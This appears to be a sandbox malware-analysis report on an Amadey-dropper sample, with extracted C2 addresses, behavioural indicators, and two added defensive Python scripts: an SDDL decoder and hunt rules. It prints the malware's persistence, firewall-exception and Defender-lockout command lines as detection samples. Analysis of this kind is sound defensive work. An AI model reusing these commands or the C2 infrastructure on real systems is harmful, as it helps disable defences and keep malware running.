Analysis

max time kernel: 103s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 02/07/2023, 00:14
Behavioral task behavioral1: sample oneetx.exe, resource win7-20230621-en
Behavioral task behavioral2: sample oneetx.exe, resource win10v2004-20230621-en
General

Target: oneetx.exe
Size: 198KB
MD5: a64a886a695ed5fb9273e73241fec2f7
SHA1: 363244ca05027c5beb938562df5b525a2428b405
SHA256: 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512: 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
SSDEEP: 3072:lWgR9+o+G2K47yLk6E9EzwHxFTTDYUSNt2kLu5gf7or7wy+wXRcWfnPjt:lWu+5a4ukZSwH/TT2NE4u5gTovv
Malware Config

Extracted: amadey (3.83)
  C2: 5.42.65.80/8bmeVwqx/index.php

Extracted: gcleaner
  C2: 45.12.253.56, 45.12.253.72, 45.12.253.98, 45.12.253.75

Extracted: smokeloader (up3)

Extracted: smokeloader (2020)
  C2: http://host-file-host6.com/, http://host-host-file8.com/

Extracted: redline (280623_rc_11)
  C2: rcn.tuktuk.ug:11285
  auth_value: 7dbd026b7e6c26ab5e41958efd6a2a6e
Signatures

Glupteba payload (3 IoCs)
resource | yara_rule
behavioral2/memory/2200-289-0x0000000002D60000-0x000000000364B000-memory.dmp | family_glupteba
behavioral2/memory/2200-298-0x0000000000400000-0x0000000000D1B000-memory.dmp | family_glupteba
behavioral2/memory/2200-419-0x0000000002D60000-0x000000000364B000-memory.dmp | family_glupteba
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

SmokeLoader
Modular backdoor trojan in use since 2014.
Suspicious use of NtCreateUserProcessOtherParentProcess (16 IoCs)
description | pid | Process | procid_target
PID 2636 created 3172 | 2636 | updChrome.exe | 59 (x5)
PID 1284 created 3172 | 1284 | updChrome.exe | 59 (x5)
PID 1496 created 3172 | 1496 | updChrome.exe | 59 (x5)
PID 5092 created 3172 | 5092 | updater.exe | 59
All 16 rows name PID 3172 (Explorer.EXE in the process tree) as the parent of the new process rather than the creating updChrome.exe/updater.exe instance, which is consistent with parent-PID spoofing: the children appear to descend from the shell.
Downloads MZ/PE file

Drops file in Drivers directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | updChrome.exe (x3)

Modifies Windows Firewall (1 TTPs, 1 IoCs)
pid | Process
2680 | netsh.exe

Stops running service(s) (3 TTPs)
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely a geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | setup.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | oneetx.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation | oneetx.exe
Executes dropped EXE (17 IoCs)
pid | Process
4080 | oneetx.exe
2772 | setup.exe
3748 | updEdge.exe
2636 | updChrome.exe
1020 | toolspub2.exe
2940 | updEdge.exe
4500 | toolspub2.exe
1284 | updChrome.exe
2200 | 3eef203fb515bda85f514e168abb5973.exe
4768 | updEdge.exe
1496 | updChrome.exe
220 | oneetx.exe
2140 | 3eef203fb515bda85f514e168abb5973.exe
5092 | updater.exe
2524 | csrss.exe
1104 | schtasks.exe
3816 | injector.exe

Yara rule match: upx (3 IoCs; the signature title for these rows is missing from the capture)
resource | yara_rule
behavioral2/files/0x000a000000023286-796.dat | upx
behavioral2/files/0x000a000000023286-797.dat | upx
behavioral2/files/0x000a000000023286-800.dat | upx
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | 3eef203fb515bda85f514e168abb5973.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in System32 directory (7 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe (x5)
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
These paths sit in the LocalSystem account's profile (config\systemprofile), so the PowerShell instances that wrote them were running as SYSTEM, not as the sandbox user.
Suspicious use of SetThreadContext (4 IoCs)
description | pid | Process | target pid | procid_target
set thread context | 1020 | toolspub2.exe | 4500 | 105
set thread context | 2940 | updEdge.exe | 2072 | 117
set thread context | 3748 | updEdge.exe | 3048 | 119
set thread context | 4768 | updEdge.exe | 2768 | 122
Checks for VirtualBox DLLs, possible anti-VM trick (1 TTPs, 1 IoCs)
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | 3eef203fb515bda85f514e168abb5973.exe
Drops file in Program Files directory (3 IoCs)
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | updChrome.exe (x3)

Drops file in Windows directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\rss | 3eef203fb515bda85f514e168abb5973.exe
File created | C:\Windows\rss\csrss.exe | 3eef203fb515bda85f514e168abb5973.exe
Launches sc.exe (21 IoCs)
sc.exe is a Windows utility to control services on the system.
pid | Process
3516, 2216, 1388, 3848, 868, 3256, 4100, 1856, 2032, 1672, 2652, 3568, 3492, 4828, 1564, 4348, 4268, 2072, 1908, 3376, 3004 | sc.exe
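One of these sc.exe invocations is visible in the process tree: `sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)`, which rewrites the security descriptor of a service. The decoder below is an added example, not part of the sandbox output or of the malware: it parses that SDDL string with the documented service-object right codes and reports which trustees can stop, pause, or reconfigure the service. The per-right evaluation assumes a token holding a single SID and walks the DACL in order; it does not model group expansion, generic-right mapping, or owner rights, which the real AccessCheck does.

```python
"""Decode the service SDDL from the `sc sdset WinDefender ...` command in this report.

Added example (not sandbox output). Answers "who can stop this service?" from the
DACL alone, for a token that holds exactly one SID; this is a simplification of
Windows AccessCheck (no group expansion, no generic-right mapping, no owner rights).
"""
import re
from dataclasses import dataclass

# Copied verbatim from the sc.exe command line in the report's process tree.
REPORT_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
    "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Two-letter SDDL right codes as they apply to service objects: (mask bit, name).
SERVICE_RIGHTS = {
    "CC": (0x00001, "SERVICE_QUERY_CONFIG"),
    "DC": (0x00002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00004, "SERVICE_QUERY_STATUS"),
    "SW": (0x00008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00010, "SERVICE_START"),
    "WP": (0x00020, "SERVICE_STOP"),
    "DT": (0x00040, "SERVICE_PAUSE_CONTINUE"),
    "LO": (0x00080, "SERVICE_INTERROGATE"),
    "CR": (0x00100, "SERVICE_USER_DEFINED_CONTROL"),
    "SD": (0x10000, "DELETE"),
    "RC": (0x20000, "READ_CONTROL"),
    "WD": (0x40000, "WRITE_DAC"),
    "WO": (0x80000, "WRITE_OWNER"),
}
GENERIC_RIGHTS = {"GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000}
WELL_KNOWN_SIDS = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
                   "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE", "WD": "Everyone"}

ACL_RE = re.compile(r"([DS]):([A-Z]*)((?:\([^)]*\))*)")          # D:flags(ace)(ace)... S:...
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")  # (type;flags;rights;obj;inh;sid)


@dataclass
class Ace:
    ace_type: str  # A = access allowed, D = access denied, AU = system audit
    flags: str     # ACE flags, e.g. FA = audit failed access, SA = audit successful access
    mask: int      # access mask decoded from the rights field
    trustee: str   # SDDL SID abbreviation (SY, BA, ...) or a literal S-1-... SID


def parse_rights(field: str) -> int:
    """Turn the rights field of an ACE into an access mask."""
    if field.startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2]
        if code in SERVICE_RIGHTS:
            mask |= SERVICE_RIGHTS[code][0]
        elif code in GENERIC_RIGHTS:
            mask |= GENERIC_RIGHTS[code]
        else:
            raise ValueError(f"unsupported right code {code!r} in {field!r}")
    return mask


def parse_sddl(sddl: str) -> dict:
    """Return {"D": [Ace, ...], "S": [Ace, ...]} for the DACL and the SACL."""
    acls = {"D": [], "S": []}
    for acl in ACL_RE.finditer(sddl):
        kind, aces = acl.group(1), acl.group(3)
        for m in ACE_RE.finditer(aces):
            ace_type, flags, rights, _obj, _inherit, trustee = m.groups()
            acls[kind].append(Ace(ace_type, flags, parse_rights(rights), trustee))
    return acls


def rights_for(dacl: list, trustee: str) -> dict:
    """Per service right, the first DACL ACE naming this trustee and this right decides;
    no matching ACE means the right is not granted (the implicit deny of a DACL)."""
    verdicts = {}
    for _code, (bit, name) in SERVICE_RIGHTS.items():
        verdict = "not granted"
        for ace in dacl:
            if ace.trustee != trustee or not (ace.mask & bit):
                continue
            verdict = "allowed" if ace.ace_type == "A" else "denied"
            break
        verdicts[name] = verdict
    return verdicts


def who_can(sddl: str, right: str) -> list:
    """Trustees, in DACL order, that end up allowed the named service right."""
    dacl = parse_sddl(sddl)["D"]
    trustees = list(dict.fromkeys(ace.trustee for ace in dacl))
    return [t for t in trustees if rights_for(dacl, t)[right] == "allowed"]


if __name__ == "__main__":
    dacl = parse_sddl(REPORT_SDDL)["D"]
    for t in dict.fromkeys(a.trustee for a in dacl):
        held = [r for r, v in rights_for(dacl, t).items() if v == "allowed"]
        print(f"{WELL_KNOWN_SIDS.get(t, t)}: {', '.join(held)}")
    print("can stop the service:", who_can(REPORT_SDDL, "SERVICE_STOP"))
    print("can rewrite the DACL:", who_can(REPORT_SDDL, "WRITE_DAC"))
```

Run against the report's string, only SY (LocalSystem) ends up with SERVICE_STOP: the BA allow ACE omits WP and DT and the following `(D;;WPDT;;;BA)` denies them outright, so an administrator's `sc stop` or `net stop` fails with access denied. The lockout is shallow, though: BA keeps DELETE and WRITE_DAC, so `sc sdset` with a sane descriptor (or `sc delete`) from an elevated prompt undoes it. The SACL entry `(AU;FA;...;;;WD)` only audits failed access by Everyone.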
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Program crash (9 IoCs)
pid | pid_target | Process | procid_target
1580 | 2772 | WerFault.exe | 97
4584 | 2772 | WerFault.exe | 97
2580 | 2772 | WerFault.exe | 97
4568 | 2772 | WerFault.exe | 97
1664 | 2772 | WerFault.exe | 97
3920 | 2772 | WerFault.exe | 97
3992 | 2772 | WerFault.exe | 97
2124 | 2772 | WerFault.exe | 97
3712 | 2772 | WerFault.exe | 97
All nine crash reports are for PID 2772, the dropped setup.exe, which the parent oneetx.exe later kills with taskkill and erases (see the process tree).
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | toolspub2.exe
Creates scheduled task(s) (1 TTPs, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4528 | schtasks.exe
3224 | schtasks.exe
1104 | schtasks.exe

Kills process with taskkill (1 IoCs)
pid | Process
2680 | taskkill.exe
Modifies data under HKEY_USERS (64 IoCs)
All keys below are relative to \REGISTRY\USER\.DEFAULT\Software\. Process column: PS = powershell.exe, GL = 3eef203fb515bda85f514e168abb5973.exe.
description | ioc | Process
Key created | Microsoft\SystemCertificates\TrustedPeople\CTLs | PS
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | GL
Key created | Policies\Microsoft\SystemCertificates\trust | PS
Key created | Policies\Microsoft\SystemCertificates\CA\CRLs | PS
Key created | Microsoft\SystemCertificates\TrustedPeople\Certificates | PS
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | GL
Key created | Microsoft\SystemCertificates\CA\CTLs | PS
Key created | Policies\Microsoft\SystemCertificates\CA | PS
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | GL
Key created | Microsoft\SystemCertificates\SmartCardRoot | PS
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | PS
Key created | Microsoft\SystemCertificates\Disallowed\CTLs | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | GL
Key created | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | PS
Key created | Microsoft\SystemCertificates\SmartCardRoot\Certificates | PS
Key created | Microsoft\SystemCertificates\Disallowed\CTLs | PS
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | GL
Key created | Microsoft\SystemCertificates\Disallowed | PS
Key created | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | GL
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | PS
Key created | Microsoft\SystemCertificates\Root\CTLs | PS
Key created | Microsoft\SystemCertificates\TrustedPeople\Certificates | PS
Key created | Microsoft\SystemCertificates\SmartCardRoot\Certificates | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | GL
Key created | Microsoft\SystemCertificates\TrustedPeople | PS
Key created | Microsoft\SystemCertificates\SmartCardRoot | PS
Key created | Microsoft\SystemCertificates\SmartCardRoot\CTLs | PS
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | GL
Key created | Policies\Microsoft\SystemCertificates\CA\CRLs | PS
Key created | Microsoft\SystemCertificates\CA\CTLs | PS
Key created | Policies\Microsoft\SystemCertificates\TrustedPeople | PS
Key created | Microsoft\SystemCertificates\trust\CRLs | PS
Key created | Microsoft\SystemCertificates\Root | PS
Key created | Microsoft\SystemCertificates\TrustedPeople\CRLs | PS
Key created | Policies\Microsoft\SystemCertificates\CA\CRLs | PS
Key created | Policies\Microsoft\SystemCertificates\trust\Certificates | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" | GL
Key created | Microsoft\SystemCertificates\Root | PS
Key created | Microsoft\SystemCertificates\TrustedPeople\CTLs | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | GL
Key created | Microsoft\SystemCertificates\Root\CRLs | PS
Key created | Microsoft\SystemCertificates\trust\CRLs | PS
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | GL
Set value (str) | Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | GL
Key created | Microsoft\SystemCertificates\Disallowed | PS
Key created | Microsoft\SystemCertificates\trust\CTLs | PS
Key created | Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | PS
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | PS
Key created | Microsoft\SystemCertificates\Disallowed\CRLs | PS
Key created | Microsoft\SystemCertificates\CA | PS
Set value (int) | Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | PS
Key created | Policies\Microsoft\SystemCertificates\Disallowed\Certificates | PS
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
4500 | toolspub2.exe (x2)
2636 | updChrome.exe (x2)
1284 | updChrome.exe (x2)
3172 | Explorer.EXE (remaining 58 entries, in two runs between the rows above; the list is capped at 64)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
3172 | Explorer.EXE

Suspicious behavior: MapViewOfSection (1 IoCs)
pid | Process
4500 | toolspub2.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs, list capped; grouped by process, original order not preserved)
description | pid | Process
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 3172 | Explorer.EXE (13 pairs, 26 entries, interleaved with the rows below)
Token: SeDebugPrivilege | 3748 | updEdge.exe
Token: SeDebugPrivilege | 2940 | updEdge.exe
Token: SeDebugPrivilege | 4768 | updEdge.exe
Token: SeDebugPrivilege | 3048 | AppLaunch.exe
Token: SeDebugPrivilege | 2072 | sc.exe
Token: SeDebugPrivilege | 2680 | netsh.exe
Token: SeDebugPrivilege | 2768 | AppLaunch.exe
Token: SeDebugPrivilege | 1388 | powershell.exe
Token: SeDebugPrivilege | 4508 | schtasks.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 4476 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 4496 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 2124 | powercfg.exe
Token: SeShutdownPrivilege, SeCreatePagefilePrivilege | 448 | powercfg.exe
Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35 | 1124 | powershell.exe
Suspicious use of FindShellTrayWindow (1 IoCs)
pid | Process
2284 | oneetx.exe

Suspicious use of WriteProcessMemory (64 IoCs, list capped)
description | pid | Process | procid_target
PID 2284 wrote to memory of 4080 | 2284 | oneetx.exe | 86 (x3)
PID 4080 wrote to memory of 4528 | 4080 | oneetx.exe | 87 (x3)
PID 4080 wrote to memory of 3948 | 4080 | oneetx.exe | 89 (x3)
PID 3948 wrote to memory of 4432 | 3948 | cmd.exe | 91 (x3)
PID 3948 wrote to memory of 1108 | 3948 | cmd.exe | 92 (x3)
PID 3948 wrote to memory of 4888 | 3948 | cmd.exe | 93 (x3)
PID 3948 wrote to memory of 3232 | 3948 | cmd.exe | 94 (x3)
PID 3948 wrote to memory of 1920 | 3948 | cmd.exe | 95 (x3)
PID 3948 wrote to memory of 4280 | 3948 | cmd.exe | 96 (x3)
PID 4080 wrote to memory of 2772 | 4080 | oneetx.exe | 97 (x3)
PID 4080 wrote to memory of 3748 | 4080 | oneetx.exe | 98 (x3)
PID 4080 wrote to memory of 2636 | 4080 | oneetx.exe | 101 (x2)
PID 4080 wrote to memory of 1020 | 4080 | oneetx.exe | 102 (x3)
PID 4080 wrote to memory of 2940 | 4080 | oneetx.exe | 103 (x3)
PID 1020 wrote to memory of 4500 | 1020 | toolspub2.exe | 105 (x6)
PID 4080 wrote to memory of 1284 | 4080 | oneetx.exe | 107 (x2)
PID 4080 wrote to memory of 2200 | 4080 | oneetx.exe | 108 (x3)
PID 4080 wrote to memory of 4768 | 4080 | oneetx.exe | 111 (x3)
PID 4080 wrote to memory of 1496 | 4080 | oneetx.exe | 112 (x2)
PID 2940 wrote to memory of 2072 | 2940 | updEdge.exe | 117 (x7)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
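The signatures above each fire on one command line that is spelled out in the process tree: Amadey's per-minute schtasks entry for its %TEMP% copy, the cacls lockdown of that copy, the firewall exception and ONLOGON task for C:\Windows\rss\csrss.exe, the `sc sdset` that denies administrators SERVICE_STOP, and the .NET AppLaunch.exe host started by updEdge.exe. The script below is an added example, not part of the sandbox output, that turns those command lines into hunt rules and runs them over process-creation records. The records are constructed here in a Sysmon Event ID 1 shape (ProcessId, Image, ParentImage, CommandLine); the field names are an assumption about the log source, the report-derived rows are copied from the tree, and the two benign controls at the end are invented.

```python
"""Hunt rules for the persistence and defence-evasion command lines in this report.

Added example (not sandbox output). Records are constructed in a Sysmon Event ID 1
shape; the field names are an assumption about the log source.
"""
import re

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# Directories from which a scheduled task or firewall exception is unremarkable.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\",
                    "c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Windows system processes that only ever live in System32.
SYSTEM_ONLY_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "winlogon.exe", "services.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def trusted(path):
    return path.lower().startswith(TRUSTED_PREFIXES)


def has(pattern, text):
    return re.search(pattern, text, re.I) is not None


def task_target(cmdline):
    """Path given to schtasks /TR (quoted or bare), or None."""
    m = re.search(r'/TR\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def rule_schtasks_minute_from_temp(ev):
    # Amadey: re-run its own copy from %TEMP% every minute.
    t = task_target(ev["CommandLine"])
    return (basename(ev["Image"]) == "schtasks.exe" and has(r"/SC\s+MINUTE\b", ev["CommandLine"])
            and t is not None and TEMP_DIR.search(t) is not None)


def rule_schtasks_onlogon_highest_untrusted(ev):
    # Glupteba: elevated logon task for a binary outside the usual program directories.
    t = task_target(ev["CommandLine"])
    return (basename(ev["Image"]) == "schtasks.exe" and has(r"/SC\s+ONLOGON\b", ev["CommandLine"])
            and has(r"/RL\s+HIGHEST\b", ev["CommandLine"]) and t is not None and not trusted(t))


def rule_cacls_denies_own_user(ev):
    # The dropper removes the invoking user's access (":N") to its own copy and directory.
    return (basename(ev["Image"]) in {"cacls.exe", "icacls.exe"}
            and has(r'/P\s+"?[^":]+:N\b', ev["CommandLine"]))


def rule_firewall_allow_untrusted_program(ev):
    m = re.search(r'program="([^"]+)"', ev["CommandLine"], re.I)
    return (basename(ev["Image"]) == "netsh.exe"
            and has(r"advfirewall\s+firewall\s+add\s+rule", ev["CommandLine"])
            and m is not None and not trusted(m.group(1)))


def rule_sc_sdset_denies_admin_stop(ev):
    # A deny ACE for BUILTIN\Administrators that carries WP (stop) or DT (pause/continue).
    if basename(ev["Image"]) != "sc.exe" or not has(r"\bsdset\b", ev["CommandLine"]):
        return False
    for m in re.finditer(r"\(D;[^;]*;([A-Z]+);[^;]*;[^;]*;BA\)", ev["CommandLine"]):
        codes = {m.group(1)[i:i + 2] for i in range(0, len(m.group(1)), 2)}
        if codes & {"WP", "DT"}:
            return True
    return False


def rule_system_name_outside_system32(ev):
    return (basename(ev["Image"]) in SYSTEM_ONLY_NAMES
            and not ev["Image"].lower().startswith("c:\\windows\\system32\\"))


def rule_applaunch_spawned_from_temp(ev):
    # .NET host started by a %TEMP% binary: the SetThreadContext hollowing chain above.
    return basename(ev["Image"]) == "applaunch.exe" and TEMP_DIR.search(ev["ParentImage"]) is not None


RULES = {f.__name__[5:]: f for f in (
    rule_schtasks_minute_from_temp, rule_schtasks_onlogon_highest_untrusted,
    rule_cacls_denies_own_user, rule_firewall_allow_untrusted_program,
    rule_sc_sdset_denies_admin_stop, rule_system_name_outside_system32,
    rule_applaunch_spawned_from_temp)}


def evaluate(events):
    """Map ProcessId -> sorted names of the rules that fired; quiet processes are omitted."""
    hits = {}
    for ev in events:
        fired = sorted(name for name, rule in RULES.items() if rule(ev))
        if fired:
            hits[ev["ProcessId"]] = fired
    return hits


def event(pid, image, parent, cmdline):
    return {"ProcessId": pid, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


T = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"
SAMPLE_EVENTS = [  # rows 1-7 copied from the report's process tree, 8-9 are invented benign controls
    event(4528, "C:\\Windows\\SysWOW64\\schtasks.exe", T + "207aa4515d\\oneetx.exe",
          '"C:\\Windows\\System32\\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "' + T + '207aa4515d\\oneetx.exe" /F'),
    event(1108, "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\cmd.exe", 'CACLS "oneetx.exe" /P "Admin:N"'),
    event(2680, "C:\\Windows\\system32\\netsh.exe", "C:\\Windows\\system32\\cmd.exe",
          'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes'),
    event(2524, "C:\\Windows\\rss\\csrss.exe", T + "1000203001\\3eef203fb515bda85f514e168abb5973.exe", "C:\\Windows\\rss\\csrss.exe"),
    event(3224, "C:\\Windows\\SYSTEM32\\schtasks.exe", "C:\\Windows\\rss\\csrss.exe",
          'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F'),
    event(1388, "C:\\Windows\\SysWOW64\\sc.exe", "C:\\Windows\\SysWOW64\\cmd.exe",
          "sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
          "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"),
    event(3048, "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", T + "1000186001\\updEdge.exe",
          '"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"'),
    event(9001, "C:\\Windows\\System32\\schtasks.exe", "C:\\Windows\\System32\\cmd.exe",
          'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Program Files\\Backup\\agent.exe" /TN Backup /F'),
    event(9002, "C:\\Windows\\System32\\netsh.exe", "C:\\Windows\\System32\\cmd.exe",
          'netsh advfirewall firewall add rule name="Chrome" dir=in action=allow program="C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" enable=yes'),
]

if __name__ == "__main__":
    for pid, names in evaluate(SAMPLE_EVENTS).items():
        print(pid, names)
```

The "trusted prefix" allowlist is deliberately crude: this very sample drops updater.exe into C:\Program Files\Google\Chrome\, so a rule that exempts Program Files would miss a firewall exception for that file. Pair path-based rules with file-origin signals (signer, first-seen time, dropping process) rather than relying on the directory alone.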
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
